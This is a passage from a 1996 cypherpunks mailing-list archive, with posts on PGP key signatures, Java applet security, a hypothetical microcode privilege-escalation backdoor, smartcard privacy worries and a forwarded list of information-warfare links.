logistic questions about performing it.


I still have a strong intuition that I could keep my cash if
I made such a proposal and gave it a few simple stipulations
(such as that the attacker would have to forge important
material in the victim's name rather than just use the
attack to eavesdrop...).  The successful attacker would
have to have the ability to get in the middle of TCP/IP 
connections as well as perhaps telephone connections, as 
well as have formidable computational and 
"social-engineering" (really: "-cracking") resources.


more later,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYSIhkjbHy8sKZitAQHKYwL+Mj/4G5JW5F+v6w3+PqIIacC1BBNfnHqR
rO5ra8bFAeGwz7vmIcmyQAxU/3PW/jjsLv0lo5f0j4eiQ/iDBYUjVUKKWfjDMzSi
qIj1HNiHOq1eZ+M1rqvchwVRFTZazXsi
=YUmd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 30 Apr 1996 13:22:07 +0800
To: cypherpunks@toad.com
Subject: unsuscrived :-|
Message-ID: <Pine.GUL.3.93.960429112150.17234I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


If you want my views on that all.net loon, Microsoft, institutional
privacy issues, digital cash, java, whowhere.com, offshore data havens,
and so on, please Cc me.

For other topics, I read coderpunks, c2-interest, cypherpunks-announce,
resnet-forum, fight-censorship (though I can't post under my own name),
comp.org.eff.talk, news.groups, talk.politics.crypto,
comp.os.ms-windows.networking.win95, and alt.fan.ernst-zundel.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 30 Apr 1996 02:02:30 +0800
To: bryce@digicash.com
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <199604281543.RAA11268@digicash.com>
Message-ID: <31849110.446B9B3D@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


bryce@digicash.com wrote:

>  Black Unicorn <unicorn@schloss.li> wrote:
> (> "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:)
> > >     IIRC, currently Black Unicorn doesn't have any signatures on
> > > his public key of others. Therefore, this requirement, while understandable,
> > > could cause a bit of a difficulty in the current situation.
> >
> > Please obtain a copy of my current key by finger.
> 
> Oh please.  My respect for Uni's acumen just decremented a
> couple of notches.  A 2048-bit key, and no signatures?
> Rather like a front door with welded plate armor and an open
> window, no?
> 
> Let's talk more off-list...

Hang on!  This is interesting - keep in on-list!

What's the big deal about not having signed his own key?

The only thing that signing your own key does is show the
[claimed] id of the real keyholder.  There's no scope for
abuse.  Claiming this to be an armour door and open window
is overreacting a bit.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 30 Apr 1996 02:25:44 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <31849110.446B9B3D@systemics.com>
Message-ID: <199604291026.MAA09328@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity callnig itself Gary Howland <gary@systemics.com> is
 alleged to have written:
>
> bryce@digicash.com wrote:
> 
> >  Black Unicorn <unicorn@schloss.li> wrote:
> > (> "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:)
> > > >     IIRC, currently Black Unicorn doesn't have any signatures on
> > > > his public key of others. Therefore, this requirement, while understandable,
> > > > could cause a bit of a difficulty in the current situation.
> > >
> > > Please obtain a copy of my current key by finger.
> > 
> > Oh please.  My respect for Uni's acumen just decremented a
> > couple of notches.  A 2048-bit key, and no signatures?
> > Rather like a front door with welded plate armor and an open
> > window, no?
> > 
> > Let's talk more off-list...
> 
> Hang on!  This is interesting - keep in on-list!


If we did, we'd have to kill you.  8-)


> What's the big deal about not having signed his own key?
> 
> The only thing that signing your own key does is show the
> [claimed] id of the real keyholder.  There's no scope for
> abuse.  Claiming this to be an armour door and open window
> is overreacting a bit.


Okay this is on-list because I have propagated disinformation
and I'm trying to propagate the correction:  for some reason
I, and apparently E. ALLEN SMITH, got a copy of Black Uni's
key which was devoid of signatures of any kind.  My
complaint was that this made it utterly open to MITM
attacks.  I was mistaken about Uni's key's lack of
signatures though, and I apologized for saying the above.


Actually, Black Uni's key via finger has two signatures (not
counting his own): Sandy Sandfort (whose key has no 
signatures, as far as my copy of it goes), and 
loki@obscura.com (whose key has 22 signatures, only 3 of 
which are from keys that I can find copies of not counting
loki's own).


more later,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMYSZZEjbHy8sKZitAQHB5wMA03m0NqNCMX0OjVdsQ+Kh7J6ZTPL3SJ/+
CqtrcrMly14cgBlDj4lWzXDZCHv179h8hyt0Y/zIG4fcnY+anUjFAN9vvUapqIxc
PkeH27XuCN1JfeJCH/eTiy0Hzf6+nN5J
=GbtJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 30 Apr 1996 01:09:42 +0800
To: cypherpunks@toad.com
Subject: Re: Cell Kill 2
In-Reply-To: <199604271851.OAA28554@pipe4.nyc.pipeline.com>
Message-ID: <Pine.GSO.3.93.960429122853.21405C-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain



>    The Russians seem to agree. On April 21, two Russian
>    laser-guided missiles reportedly zeroed in on the cellular
>    telephone of Dzhokhar M. Dudayev, leader of the Chechen
>    rebels, and killed him.

As far as I know, he was using a satellite phone (probably Inmarsat) on
open ground outside a building. They had been using satellite phones
before, but usually they were transmitting one-way information only
(either voice or video), which had been recorded before, so Dudajev was
not near at the time of connections. This time it had to be two-way,
because he was negotiating with Moscow officials. 

BTW Dudajev was living in Estonia for a long time (before he started
fighting for Chechen independence), being the head of Russian air forces
located in Estonia. Now the building where he was working has been
reconstructed as an hotel, and there is a special Dudajev suite, in case
someone is visiting Estonia :) Estonian people are also very supportive
for Chechen fight for independence.

Juri Kaljundi
jk@stallion.ee
AS Stallion





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 30 Apr 1996 13:53:29 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: The Joy of Java
In-Reply-To: <199604290530.WAA25425@jobe.shell.portal.com>
Message-ID: <Pine.BSF.3.91.960429122114.12216A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Somewhat independent of the security/safety issues regarding Java
> applets, there are also questions about their suitability for crypto
> applications.  Applets currently labor under several restrictions (at
> least when part of the Netscape browser) which make it hard to do crypto:
>
>   Applets cannot accept net connections, and they can only make outgoing
>   connections to the host which provided them to the browser.
>
>   Applets cannot read or write local disk files.
>
>   Applets cannot access other local hardware, such as smart cards,
>   printers, or microphones.
[SNIP]
> So there are limits to how much safety you can expect.  Hopefully with
> signed applets it will be OK to authorize some overrides of the current
> restrictions so that these other kinds of applications can be provided.

My understanding is, Java applications (as opposed to applets) don't have
those limitations, and can do _almost_ anything a C program can. The
applications still have the full cross-platform compatability. IMO dumping
the security of applets in favour of the capability of applications is a
good idea. After all, the applet security features have a lot of flaws, 
so why limit your programs when it's not offering any real security?

Signing programs is a good idea. It will provide better security than we 
currently have, without having to limit the capabilities of the software.

JMHO.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 30 Apr 1996 13:11:09 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: [WhoWhere?]
Message-ID: <9604291941.AA25754@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


I did a search for "sybase.com" and, while there were no e-mail addresses
of Sybase employees, I now know of a bunch of places running Sybase
software.  At least, I presume so, since they have an account named sybase.

Also, a search on root turned up this particularly entertaining entry...

http://people.whowhere.com/pages/ask@ist.flinders.edu.au

Is this one of the people who volunteered their own information?

     Ryan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 30 Apr 1996 14:09:34 +0800
To: cypherpunks <cypherpunks@sybase.com>
Subject: Re: Cell Kill 2
Message-ID: <9604292018.AA26791@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


It's all just an elaborate plot to help discourage cell-phone cloning.

     Ryan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Tue, 30 Apr 1996 13:25:24 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor	  missing
Message-ID: <v02140b01adaae1591333@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>CNN is reporting that Colby's canoe has been found on the Potomac and
>Colby is missing.

Hmm, I wonder whether any of the anonymous contributors to Cypherpunks
has suddenly stopped contributing?

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Apr 1996 12:53:57 +0800
To: John Young <cypherpunks@toad.com
Subject: BOW_itz
Message-ID: <199604292122.OAA15633@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Apr 1996 14:20:58 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <199604292122.OAA15639@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 AM 4/27/96 -0800, Norman Hardy wrote:
>At 9:53 AM 4/25/96, Jeffrey C. Flynn wrote:
>....
>>
>>It looks like I may have no other option than to give some processor some
>>degree of trust. Which processor I should choose, and why that one?
>....
>In the days of microcode this was my best (worst?) scenario. Setting up for
>fast divide has been an art long before Pentium divide fame. In microcode
>you don't spend time testing for cases that you can prove won't happen.
>Some obscure cases can arise only with a rare combinations of two 48 bit
>operands. The microcode flaw would be to put the processor into privileged
>mode even while getting the right answer. There would plausible deniability
>even if the flaw were discovered. (Gosh, I didn't test for this fall thru
>case because here is the proof that it can't happen.) Of course there is a
>bug in the proof but no one reads proofs. This can now be exploited by
>anyone that knows what division leaves the machine in privileged state.
>
>This is an attack on those systems that are rated to run untrusted machine
>code, using privileged mode code to limit the operation of the untrusted
>code.
>
>Only one person is necessary to pull this off. He must be trusted to
>produce microcode and the implementer of the divide algorithm. Test code
>will not find the transition to privileged code just because you can't test
>the whole machine state after every tested instruction. Normally the bogus
>privileged state of the machine will quickly expire (on the next interrupt)
>and will cause no permanent state change even in those few cases where a
>magic division occurs naturally.

There are some limits to the extent of this kind of problem.  If the
hardware/OS you are using provides a completely disjoint memory map based
on the privileged mode state, it may be hard to exploit the ability to
switch to privileged mode.  With maps which allow access to the user's
address space while in privileged mode (e.g. Solaris), it may be possible
to just keep running, and so complete a successful attack.

On the other hand, with most systems I have seen, setting yourself into
privileged state will persist thru the next interrupt.  The system Norm and
I worked on would detect it later.  (It checked every 5 minutes or so.) 
The IBM operating systems I have used would not detect, or correct this
change.

The ray  of hope in this area is that there are so many other easier
attacks on modern systems.  People will have a tendency to use them first.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Apr 1996 13:49:49 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The Joy of Java
Message-ID: <199604292122.OAA15675@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:35 PM 4/28/96 -0400, E. ALLEN SMITH wrote:
>        If Java can indeed be reworked to provide proper security (e.g., if
>Perry's incorrect in this case - everyone's falliable), then how much
>modifications are likely to be necessary? I'm currently looking at the
>possibility of learning a modern high-level computer language, and Java looks
>like one of the more promising options. (I currently know a bit of Applesoft
>Basic, Quattro Pro Macro language, VAX/VMS .COM file language, and MS-DOS
>batch file language.) In other words, I'm wondering if it's worth my while to
>learn Java now, or if I should wait (and possibly learn another language) until
>the bugs are worked out? Will removing the flaws make it such a different
>language that learning it now won't be of much use for someone like me?

I think Java is an excellent language to learn as a part of learning modern
programming languages and techniques.  Even if the bytecode verifier falls
completely on its face, you will still know a safer language than C or C++.
 (However, if the verifier falls, you may also know an obsolete language.)

The syntax of Java is similar to C and C++, which may help you learn those
languages (in the same way knowing Italian helps you learn Spanish).  The
garbage collected nature of Java may get you into bad habits when using C
or C++, but since I switch back between Assembler and Java, it is not
insurmountable.

I do not think the Java bugs are bad enough to make it a poor language for
learning.  However, it is a very young language, and "nice" programming
environments aren't quite here yet.  However, new environments are being
delivered every month, so if you demand luxury environments, you shouldn't
have to wait too long.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 30 Apr 1996 13:58:08 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <199604292144.OAA20003@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Unfortunately in order to run Java applications it is necessary to have
the Java interpreter for your host.  You may also have to set up
various scripts or filetype assignments so that java files can be
easily and automatically run by that interpreter.  Right now the Java
interpreter is not (AFAIK) available separately, but only as part of
the Java Development Kit (which is free, but is a big package).  So
generally the infrastructure is not really there for Java applications
to be easily downloaded and run by end users.  The attraction with
applets is that if you have a recent version of Netscape and a 32 bit
OS you are already set up to run them (whether you like it or not, for
probably the majority of end users).

Also those security and safety features which exist for applets (buggy as
they may be at this time) don't exist at all for applications.  Java
applications can delete or modify files, make arbitrary net connections,
etc.  So certainly more care must be taken in choosing to download and
run a Java application than an applet, comparable to what is necessary
when you download and run a new PC application program.  Signed binaries
are probably again the way to go here.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 30 Apr 1996 14:37:55 +0800
To: cypherpunks@toad.com
Subject: [Pointer] fight-censorship-discuss
Message-ID: <Pine.GUL.3.93.960429145535.17234U-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


FYI.

-rich
 "Have you no decency, sir?"

To: majordomo@c2.org
Subject: ignored

info fight-censorship-discuss





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Tue, 30 Apr 1996 14:38:01 +0800
To: cypherpunks@toad.com
Subject: Re: Smartcards are coming to the US
Message-ID: <m0uDzVt-0048voC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:00 PM 4/20/96 -0700, Lucky Green wrote:
>Years after smartcards have become ubiquitous in such countries as Pakistan
>and Nepal, not to mention Europe, I just saw my first smartcard commercial
>ever on US television.
>
>Way to go :-)
>
>
>
>Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.
>
>-- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.

Hummm... Did you ever wonder *why* this was introduced to the "third-world"
countries first? If you've been following the progress of the so called "smart-
card," you will have noticed it was first introduced to areas that are extremely
"low-tech" and well off the beaten path. Also the areas it was *first* introduced
were generally marked by a high population density. Notice, "low-tech," high
population density and in locations that are definitely out of the loop when it 
comes to news coverage. There was obviously a strategy involved and I think
it would be prudent to wonder why.

The U.S. is one of the most technologically advanced nations on the face of the 
earth. The citizenry are very familiar with technology and are quite adept in it's
uses. Not to mention the fact that some of the worlds pivotal financial markets are
located here, it makes one wonder why they didn't introduce the card here.

I for one am not nearly so intrigued with the benefits of these "smart cards." I
see too much room for mischief. Already, where I live, there are Insurance com-
panies that have access to the data bases of grocery stores in this area. If one
uses one's "debit card" to purchase groceries... and say, purchases a carton of
cigarettes for a loved one or friend, the insurance company has access to that
information. There is a growing collection of information being gathered on every-
one in this country. Although it appears to be harmless, using sophisticated 
collation and analysis techniques, the accuracy of the inferences *I* believe 
constitute an invasion of privacy and a clear and present danger. 

Consider a scheme used by local law enforcement here several years ago. They
set up an operation with the several horticulture stores. Anyone purchasing 
"grow lights" was noted, their license plates were copied and later... based on 
the fact, a person purchased a "grow light" a search warrant was issued for the
search of their homes. Although grow lights are used all the time for legitimate
purposes it was assumed that anyone purchasing one was growing marijuana.
Imagine being awakened at 6:00 am by a team of narcotics officers with dogs 
and a warrant allowing them to search your premises. 

Given the current asset forfeiture laws, and given that well over 75% of the 
money supply by government studies has been contaminated with cocaine, you
could lose your home if the dogs happen to "hit" on any money in your home. 
Never mind you're not one who grows or deals in narcotics, this is extremely
dangerous! In the new anti-terrorism bill recently signed, the FBI has been given
the ability to tap 1 out of 10 phone lines without the need to actually come out and
set up a tap on your line. This will now be handled automatically for them by your
friendly phone company.

I see "smart cards" as one more twist in the ever tightening noose around our
necks and the Bill of Rights. Not only will the cards be able to keep your complete
history from cradle to the grave on them, but what's to prevent them from being
used in the future as an internal passport of sorts? We are rapidly approaching
the point where we will be stopped and required to produce our papers. This 
information will be readily available to any government agency... and not a few
corporations to exploit at will. No I'm not at all enthused with the advent of the
smart card.

Currently there is much discussion regarding various banking institutions 
charging excessive amounts for transaction fees at your local "ATM."  Wonder
how much they will be looking to charge for this service? Something to think 
about.

Benjamin T. Moore, Jr.
(btmoore@iquest.net)



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMYT0c4SAJOVFNaChAQG6kAf/SF/cMlbkj+0FQCBjHe29wJR93UMBqykf
Fz0N9dUB+TLksddhcEMWzwY0oDGjT87DOjYmimzvDQgwinxQEemxe4pS2ph2ydJZ
3iELOWRcyKdD4Hi+RB2O9gjKNR6M1O2I/cvdnxjV6r+L9Ysd1ea35jJ2R7LhVVMf
MRQQuMs3zx5zJafp2LNI43JCGvWweHy0ZEzHex65Ee9FdRTLNT5KIbl/QHaFP6Ij
gMWysxBnj3bBCoBx0l511GMmPN0W/tycec45EvRFhJOUPR+H0bKhzoYs46tSQAkr
NPPTFCdvFae539xgWlvVpIffp/mGigsjaKv7WJRu4hEpQeRV9lNGmA==
=GGwf
-----END PGP SIGNATURE-----
---------------------------------------------------------------------------------------------------------------
"When they came for the Fourth Amendment I didn't say anything 
because I had nothing to hide.
  When they came for the Second Amendment I didn't say anything 
because I wasn't a gun owner.
  When they came for the Fifth and Sixth Amendments I didn't say 
anything because I had committed no crimes. 
  When they came for the First Amendment I couldn't say anything."
--------------------------------------------------------------------------------------------------------------
PGP Key available from key servers, or on request.
Key Fingerprint = 3D 90 0C 58 EE 65 AE 89 28 C5 58 A2 D5 F4 A8
--------------------------------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Apr 1996 14:34:27 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Mindshare and Java
Message-ID: <199604292302.QAA24610@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:56 PM 4/27/96 -0700, Marianne Mueller wrote:
>One thing I don't understand, why do you trust signed code? 
>
>So you know the code is signed by Jack the Ripper.  so what?  How do 
>decide what you want the code to be allowed to do?   I think there's 
>nothing for it but a kind of limited capabilities model built on top
>of the authentication mechanism. 

I have extensive experience in design and implementation of a pure
capability operating system (KeyKOS).  If you think my professional
services would be of use to the Java group, please let me know.  Resume
available on request.

Thanks - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 30 Apr 1996 14:40:44 +0800
To: bryce@digicash.com
Subject: Re: connecting Uni to the Web O Trust
In-Reply-To: <199604290846.KAA01661@digicash.com>
Message-ID: <Pine.SUN.3.93.960429161730.5790A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996 bryce@digicash.com wrote:
> 
> In the meantime, I cannot have much confidence in the
> security of my private communications with Black Unicorn,
> which makes me hesitant to exchange money with him.

That's ok, I prefer cash.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Tue, 30 Apr 1996 14:35:03 +0800
To: perry@piermont.com
Subject: Re: The Joy of Java
In-Reply-To: <199604292245.SAA10827@jekyll.piermont.com>
Message-ID: <199604292322.QAA25776@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Java applications can't save files to disk or use data files on
> disk.

	Uh, yes they can. It's the applets that can't.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 30 Apr 1996 13:40:15 +0800
To: "'jsw@netscape.com>
Subject: RE: www.WhosWhere.com selling access to my employer's passwd file
Message-ID: <01BB35ED.7BA25CA0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


>   We go to great pains to keep from revealing your e-mail address to
> a web site.  Several of the fixes in 2.01 were for these sorts of problems.
> Given a current version of Netscape Navigator, how would a spam-king
> steal your e-mail address from his web page?

I just noticed an attack vector that I wasn't aware of previously.  If the browser
is running with CLASSPATH set to include the JDK classes.zip applets are
suddenly able to enumerate all the system properties.
On my system user.name is set to '?', but user.dir and user.home are both
available.

This isn't a huge exposure, but it is unsettling.

-Blake (off to poke around further)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 30 Apr 1996 16:04:15 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.SUN.3.91.960427153644.3252A-100000@crl12.crl.com>
Message-ID: <199604300014.RAA15577@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>The MODERN state is doomed and, thanks to technology, the people 
>have too much power to permit more "traditional" governments to
>control them.  States may not go quietly into that gentle night,
>their death throes may be very bloody, but go they will.

the question is of course, what will the "modern" state be 
replaced with? imagine a system in which everyone coordinates
their public or community projects via web pages, or groupware,
or the internet, or cyberspace, or something like that.
would this be a "government"? to cryptoanarchists, "government"
is a four-letter word, even though there may be other systems
that they embrace that effectively perform similar functions.

the cryptoanarchists tend to define government in weird ways
that most people don't agree with. "government is the entity
that collects taxes with the threat of force". "government
is the entity with a monopoly on force". "the only purpose
of government is to prevent people from hurting each other
and to protect private property". 

what amazes me is that many so-called "cryptoanarchists" are
committed to their communities and interested in the welfare
of their peers. when you formalize this, you have government.
granted, it often goes astray, but in my view our government
is out of control not because of the evil of politicians, but
because of the apathy and resignation of the public, which 
could have checked it before it got out of hand.

instead the attitude in this country is, "here is my tax money,
20% of my earnings. did I send you the right amount? are you
not going to audit me? good. then please leave me alone".

if the attitude were instead, "what the @#$^%^&* are you doing
with MY MONEY?!?!?" we would have had a different system. I
intend to write an essay on that here.

what I think everyone can believe is that our current system
is broken and it being replaced with something better is
fairly inevitable. but labelling the inevitable alternative
"anarchy" doesn't quite make sense to me nor do I think that
is really what some anarchists are advocating. small 
self-governed communities that are in themselves autonomous,
and aren't manipulated by an outside authority, is what most
people have in mind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hieronym@desk.nl (t byfield)
Date: Tue, 30 Apr 1996 13:46:19 +0800
To: cypherpunks@toad.com
Subject: FWD: info war info (& that All.net loon)
In-Reply-To: <Pine.ULT.3.92.960416202041.26011B-100000@Networking.Stanford.DU>
Message-ID: <v03006600adaa8c47d50a@[193.0.0.2]>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------

From:          "ITNS administrator" <admin@intellitech.cz>
Organization:  IntelliTech s.r.o.
To:            ITNS/INT.subscribers@traveller.cz (Czech & Slovak republics)
Date:          Mon, 29 Apr 1996 08:38:46 +0000
Subject:       Information Warfare


===========
Web sites, information services, associations
===========

- Air Chronicles (US Air Force Web site) =>
http://www.cdsar.af.mil/

- Airborne Electronic Warfare Systems Department =>
http://www.code802.nwscc.sea06.navy.mil/

- C4I HORIZON '95 =>
http://infosphere.safb.af.mil/~rmip/h95top.htm

- DISA Center for INFOSEC (CISS). ("The Center for
Information Systems Security's (INFOSEC) (CISS) goal is
to create and manage a unified,   fully integrated
information systems security program for all Defense
Information Infrastructure (DII)   systems. CISS acts as the
focal point for assuring availability, integrity and
confidentiality of DII Automated   Information Systems
(AIS) information.") => http://www.disa.mil/ciss/ciss.html

- Electronic Privacy Information Center (EPIC ) online
guide to privacy resourcesj. (EPIC is a public interest
research center in Washington, DC. For more information
email info@epic.org) =>
http://cpsr.org/cpsr/privacy/epic/privacy_resources.faq

- Federation of American Scientists (FAS) (The). (FAS
conducts analysis and advocacy on science, technology
and public policy, including nuclear weapons, arms sales,
biological hazards, secrecy, and space policy. FAS is a
privately-funded non-profit policy organization whose
Board of Sponsors includes half of America's living Nobel
Laureates.) => http://www.clark.net/pub/gen/fas/

- Information Warfare =>
http://www.rain.org/~lonestar/infowar.htm

- Information Warfare: The Invisible War =>
http://www.seas.gwu.edu/student/kimc/

- Information Warfare books and resources from
Management Analytics => http://all.net/books/iw/top.html

- Institute for the Advanced Study of Information Warfare
(IASIW), a virtual nongovernmental organization formed
to facilitate an understanding of information warfare with
reference to both military and civilian life. =>
http://www.psycom.net/iwar.1.html

- Intelligence reform project =>
http://www.clark.net/pub/gen/fas/irp/

- Internet Security Issues =>
http://www.cs.albany.edu/~ault/security/

- Line of Site -- US Military Sites on the Internet (an
address book of about 350 URL's pertaining to the US
Military. This is a no frills, cut to the heart of the matter,
publication, presenting welcome relief for those of us who
are tired of wading through pages of photos and
descriptors just to find one URL. Listings are in
alphabetical order and there is even space for writing in
additions or comments. $12.00 plus $3.00 shipping and
handling. Periodic updates will be available from the
publishers -- electronic transmission is available. Send
cash, check or money order to Real Trends, Inc., 9200
Centerway Road, Gaithersburg, Maryland 20879, USA - be
sure to include your full mailing address.

- National Computer Security Association (NCSA) (NCSA's
mission is to foster improvement in all aspects of world-
wide digital security, reliability and ethics by
providing key services to three principal constituents: end-
users of digital technologies, computer and
communications industry product developers and vendors,
and computer and information security experts.) =>
http://www.ncsa.com/

- National Military Intelligence Association (NMIA) =>
http://www.cais.com/NMIA/HomePage.html

- National Security Agency (NSA) =>
http://www.nsa.gov:8080/

- National Technical Information Service (NTIS) =>
http://www.fedworld.gov/ntis/ntishome.html

- Naval Postgraduate School (The): Joint C4I Systems
Curriculum => http://www.stl.nps.navy.mil/c4i/

- Office of the Director of C4I (Information Systems for
Command, Control, Communications, and

Computers) => http://www.army.mil/disc4-pg/disc4.htm

- Reto E. Haeni's Information Warfare Home Page =>
http://www.seas.gwu.edu/student/reto/infowar/info-
war.html

- S.D. James' Information Warfare Home Page =>
http://vislab-www.nps.navy.mil/~sdjames/info_war.html

- Security (Web site with resources) =>
http://www.southwind.net/~miked/security.html

- Third Wave Revolution (The): Netwars and Activists,
Power on the Net =>
http://www.teleport.com/~jwehling/OtherNetwars.html

- U.S. Air Force Air Intelligence Agency =>
http://www.dtic.dla.mil/airforcelink/pa/factsheets/Air_Intelli
gence_Agency.html

- U.S. Army Digitization Master Plan
=>http://fotlan5.fotlan.army.mil/..ADMP/adotoc.htm

- U.S. Army Research Laboratory =>
http://www.brl.mil/EA/ARL_homepage.html

- U.S. Navy Warfare Systems and Sensors Research
Directorate => http://www.nrl.navy.mil/code.5000.html

- USA FA 53 (Serving Uniformed Service Automation and
Acquisition Professionals, Systems Automation) Home
Page => http://www.seas.gwu.edu/seas/fa53/index.html


===========
Electronic mailing list, newsgroup archives
===========

- C4I Professionals Mailing List, Naval Postgraduate
School => http://dubhe.cc.nps.navy.mil/~rdthrash/c4i-
pro.html

- C4I-Pro Archive =>
http://www.stl.nps.navy.mil/lists/c4i-pro/date.html

